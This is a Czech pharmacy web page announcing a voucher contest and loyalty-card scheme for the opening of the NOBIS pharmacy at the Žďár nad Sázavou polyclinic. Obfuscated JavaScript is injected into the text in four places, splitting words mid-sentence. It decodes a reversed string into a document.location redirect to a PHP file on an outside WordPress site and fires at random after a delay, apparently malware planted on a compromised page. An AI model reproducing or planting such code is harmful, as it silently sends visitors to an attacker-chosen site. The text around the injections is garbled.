Rainbow page separator

Soutěž o hodnotné poukazy na nákup v NOBIS Lékárně Polikliniky Žďár nad Sázavou!!!

Úterý, 15. září 2020

Vážení obyvatelé města Žďár nad Sázavou, Vážení pacienti Polikliniky, již brzy budeme otevírat partnerskou NOBIS Lékárnu Polikliniky Žďár nad Sázavou. Při té["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to příleži["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tosti jsme si pro Vás připravili soutěž o poukazy na nákup v naší lékárně.

O co soutěžíme?

Máme pro Vás připraveno celkem 22 poukazů na nákup v NOBIS Lékárně. Z ["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toho je 15 poukazů v hodnotě 500 Kč, 5 poukazů v hodnotě 1000 Kč a 2 poukazy v hodnotě 2000 Kč. Částka, kterou vyhrajete Vám bude nahrána ve formě kreditu na Vaši Věrnostní kartičku NOBIS Lékárny (například vyhrajete-li 2000 Kč, na Vaši věrnostní kartičku Vám bude nahrán kredit ve výši 2000 bodů). Kredit následně můžete uplatnit při nákupu zboží dle Vašeho uvážení v naší NOBIS Lékárně.

Jak se soutěže zúčastnit?

Stačí jen v NOBIS Lékárně udělat útratu nad 200 Kč (do soutěže se počítá i donesený recept s léky v hodnotě nad 200 Kč) a zároveň si při nákupu registrovat Věrnostní kartičku NOBIS Lékárny. Pouze provedete uvedené dva kroky a už jste zapojeni do soutěže. 😊👍

Od kdy do kdy soutěž probíhá?

Začátek soutěže bude zahájen prvním dnem otevření NOBIS Lékárny, termín otevření se blíží a my Vás o něm budeme samozřejmě informovat. 😊 Soutěž bude probíhat do 30. lis["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}topadu 2020.

Co získáte registrací Věrnostní kartičky NOBIS Lékárny kromě možnosti být zařazeni do soutěže?

Při každém nákupu v NOBIS Lékárně, při kterém předložíte Věrnostní kartičku NOBIS Lékárny se Vám za každou jednu korunu z hodnoty Vašeho nákupu načte na Vaši Věrnostní kartičku NOBIS Lékárny jeden bod. Při dosažení hranice 1000 bodů Vám na Vaši kartičku načteme kredit odpovídající částce 20 Kč. Body Vám samozřejmě budeme načítat i za léky na recept.

Sledujte náš facebook, ať máte informace o začátku soutěže a dalších akcích, které pro Vás chystáme. 😊

Těšíme se Vaši návštěvu a na Vaši účast v soutěži. 😊👍